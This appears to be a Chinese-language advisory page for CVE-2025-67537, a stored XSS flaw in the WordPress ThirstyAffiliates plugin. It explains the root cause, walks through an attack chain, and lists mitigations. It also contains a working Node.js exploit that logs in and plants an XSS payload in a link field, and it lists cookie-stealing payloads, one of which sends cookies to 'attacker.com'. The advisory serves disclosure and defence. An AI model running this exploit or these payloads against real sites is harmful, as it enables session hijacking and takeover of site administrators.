CVE-2025-67537 WordPress ThirstyAffiliates插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67537

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WordPress ThirstyAffiliates插件

漏洞概述

CVE-2025-67537是WordPress ThirstyAffiliates插件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Patchstack团队的安全研究人员发现并报告，存在于ThirstyAffiliates插件3.11.8及以下版本中。ThirstyAffiliates是一款流行的WordPress联盟链接管理插件，被广泛应用于网站联盟营销场景中，帮助网站管理员管理和追踪联盟链接。

该漏洞的根本原因在于插件在处理用户输入时未能正确对特殊字符进行HTML转义或输出编码。当低权限用户（如WordPress的订阅者或贡献者角色）在添加或编辑联盟链接时，如果输入包含恶意JavaScript代码的内容，这些代码将被永久存储在数据库中。随后，当其他用户（包括管理员）或网站访客访问包含这些恶意内容的页面时，存储的XSS payload将作为HTML的一部分被浏览器执行。

由于存储型XSS的特点，攻击者无需诱导用户访问专门的恶意页面，而是通过正常的内容展示页面即可触发攻击。这使得漏洞的利用更加隐蔽和持久。攻击者可以利用此漏洞窃取会话Cookie、劫持用户账户、执行管理员操作、植入恶意重定向或进行钓鱼攻击。在某些场景下，存储型XSS甚至可能被用于横向移动，危害整个WordPress站点生态系统。

该漏洞的CVSS评分为6.5，属于中等严重程度。攻击向量为网络，攻击复杂度低，需要低权限认证，但需要用户交互才能完成攻击。机密性、完整性和可用性影响均为低级别。考虑到该插件的广泛使用以及存储型XSS的持久性特点，建议网站管理员尽快评估并应用安全更新。

技术细节

CVE-2025-67537漏洞源于ThirstyAffiliates插件在处理联盟链接数据时的输入验证和输出编码不足。具体来说，插件在保存链接元数据（如链接标题、目标URL、分类标签等）时，未能对用户提供的字符串进行充分的HTML实体编码。当这些数据被回显到WordPress管理后台或前端页面时，浏览器会将未转义的HTML标签和JavaScript代码作为可执行内容处理。

漏洞的技术细节可以从以下几个层面分析：

1. **输入层面**：插件的链接添加/编辑表单接收用户输入后，直接将数据写入WordPress数据库的wp_postmeta表或专用数据表中。缺乏对<script>、<img>、<iframe>、<svg>等可执行HTML元素的过滤或转义。

2. **存储层面**：恶意payload以原始形式存储在数据库中，这意味着即使后续对代码进行修复，已存储的恶意内容仍需手动清理。

3. **输出层面**：当管理员或其他用户查看链接列表、链接详情或访问前端展示页面时，插件调用相关API函数获取数据并渲染HTML。由于输出时未使用esc_html()、esc_attr()或类似的安全转义函数，导致存储的JavaScript代码被浏览器执行。

4. **利用条件**：攻击者需要拥有WordPress低权限账户（PR:L），能够访问插件的链接管理功能。攻击者提交恶意payload后，payload会持久化存储，每次相关页面被访问时都会触发执行（UI:R）。

5. **攻击场景**：攻击者可在链接描述字段中插入如<img src=x onerror=alert(document.cookie)>的payload，当管理员查看链接列表时，JavaScript代码即在管理员浏览器中执行，可窃取认证cookies并提升权限。

攻击链分析

STEP 1

1. 信息收集

攻击者通过扫描或已知信息确认目标网站使用WordPress CMS并安装了ThirstyAffiliates插件版本<=3.11.8

STEP 2

2. 账户获取

攻击者注册或获取目标WordPress站点的低权限账户（如订阅者或贡献者角色），该角色通常具有访问ThirstyAffiliates链接管理功能的权限

STEP 3

3. Payload构造

攻击者构造恶意XSS payload，常见形式如：<img src=x onerror=alert(document.cookie)>、<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>等

STEP 4

4. 恶意输入提交

攻击者通过插件的链接添加/编辑功能，在链接标题、关键词、描述或分类等字段中注入XSS payload。数据直接写入数据库，未经过滤或转义

STEP 5

5. 持久化存储

恶意payload以原始形式永久存储在WordPress数据库中。即使后续插件更新修复漏洞，已存储的恶意数据仍需手动清理

STEP 6

6. 受害者访问

当管理员或具有编辑权限的用户访问ThirstyAffiliates链接列表、链接详情页面或前端展示页面时，浏览器解析并执行存储的JavaScript代码

STEP 7

7. 会话劫持

XSS payload执行后，攻击者可通过document.cookie获取受害者的认证cookies，或执行更复杂的JavaScript代码进行账户劫持、权限提升或数据窃取

STEP 8

8. 横向移动

攻击者利用窃取的会话cookie冒充管理员执行更高权限操作，如安装恶意插件、修改主题文件或创建后门账户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67537 Stored XSS PoC for ThirstyAffiliates <= 3.11.8
// Author: Security Researcher
// Target: WordPress with ThirstyAffiliates plugin installed

// This PoC demonstrates the stored XSS vulnerability in ThirstyAffiliates plugin
// The attacker needs low-privilege WordPress account (subscriber/contributor role)

const axios = require('axios');
const crypto = require('crypto');

class ThirstyAffiliatesXSS {
  constructor(targetUrl, username, password) {
    this.targetUrl = targetUrl.replace(/\/$/, '');
    this.username = username;
    this.password = password;
    this.cookieJar = [];
    this.nonce = null;
  }

  async login() {
    // Step 1: Obtain WordPress login nonce
    const loginPage = await axios.get(`${this.targetUrl}/wp-login.php`);
    const loginNonceMatch = loginPage.data.match(/name="_wpnonce" value="([^"]+)"/);
    
    if (!loginNonceMatch) {
      throw new Error('Failed to obtain login nonce');
    }
    this.nonce = loginNonceMatch[1];

    // Step 2: Perform login
    const loginData = new URLSearchParams({
      'log': this.username,
      'pwd': this.password,
      'wp-submit': 'Log In',
      '_wpnonce': this.nonce,
      'redirect_to': '/wp-admin/',
      'testcookie': '1'
    });

    const loginResponse = await axios.post(
      `${this.targetUrl}/wp-login.php`,
      loginData.toString(),
      {
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
          'Cookie': 'wordpress_test_cookie=WP+Cookie+check'
        },
        maxRedirects: 0,
        validateStatus: (status) => status < 400
      }
    );

    // Extract authentication cookies
    const setCookie = loginResponse.headers['set-cookie'] || [];
    this.cookieJar = setCookie.map(c => c.split(';')[0]).join('; ');
    
    console.log('[+] Login successful');
    return true;
  }

  async addMaliciousLink() {
    // Step 3: Navigate to ThirstyAffiliates link adder
    const addLinkPage = await axios.get(
      `${this.targetUrl}/wp-admin/post-new.php?post_type=thirstylink`,
      { headers: { 'Cookie': this.cookieJar } }
    );

    // Extract nonce for link creation
    const addNonce = addLinkPage.data.match(/name="_wpnonce" value="([^"]+)"/);
    if (!addNonce) {
      throw new Error('Failed to obtain add link nonce');
    }

    // Step 4: Inject stored XSS payload
    // Payload: <img src=x onerror=alert(document.cookie)>
    // This will execute when admin views the link in admin panel
    const xssPayload = '<img src=x onerror=alert(document.cookie)>';
    
    const linkData = new URLSearchParams({
      'post_title': 'Malicious Affiliate Link ' + Date.now(),
      'content': '',
      '_wpnonce': addNonce[1],
      '_wp_http_referer': '/wp-admin/post-new.php?post_type=thirstylink',
      'tax_input[thirstylink-category]': '',
      'ta_destination_url': 'https://malicious-site.com',
      'ta_keyword': xssPayload,  // XSS payload injected here
      'publish': 'Publish'
    });

    const publishResponse = await axios.post(
      `${this.targetUrl}/wp-admin/post.php`,
      linkData.toString(),
      {
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
          'Cookie': this.cookieJar,
          'Referer': `${this.targetUrl}/wp-admin/post-new.php?post_type=thirstylink`
        }
      }
    );

    if (publishResponse.status === 200) {
      console.log('[+] Malicious link created successfully');
      console.log('[+] XSS payload stored in plugin database');
      console.log('[+] Payload will execute when admin views link list');
      return true;
    }
    return false;
  }

  async exploit() {
    console.log('[*] CVE-2025-67537 Exploitation');
    console.log('[*] Target: ThirstyAffiliates <= 3.11.8');
    console.log('[*] Vulnerability: Stored XSS in link keyword field\n');

    try {
      await this.login();
      await this.addMaliciousLink();
      console.log('\n[*] Exploitation complete');
      console.log('[*] Wait for admin to view links to trigger XSS');
    } catch (error) {
      console.error('[-] Error:', error.message);
    }
  }
}

// Usage
if (require.main === module) {
  const target = process.argv[2] || 'http://target-wordpress-site.com';
  const user = process.argv[3] || 'attacker';
  const pass = process.argv[4] || 'password';
  
  const exploit = new ThirstyAffiliatesXSS(target, user, pass);
  exploit.exploit();
}

// Node.js execution: node poc.js http://target.com attacker password
// Python alternative: Use requests library with similar logic

影响范围

ThirstyAffiliates <= 3.11.8

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1）限制或禁用低权限用户对ThirstyAffiliates插件的访问权限；2）使用WordPress安全插件设置输入过滤规则，阻止<script>、<img>、<iframe>、<svg>等HTML标签的提交；3）手动检查并清理wp_postmeta表中包含恶意代码的记录；4）部署内容安全策略（CSP）头部限制JavaScript执行；5）监控管理员账户的异常登录行为和会话活动。建议在完成临时缓解后，仍应尽快升级到插件官方发布的安全版本。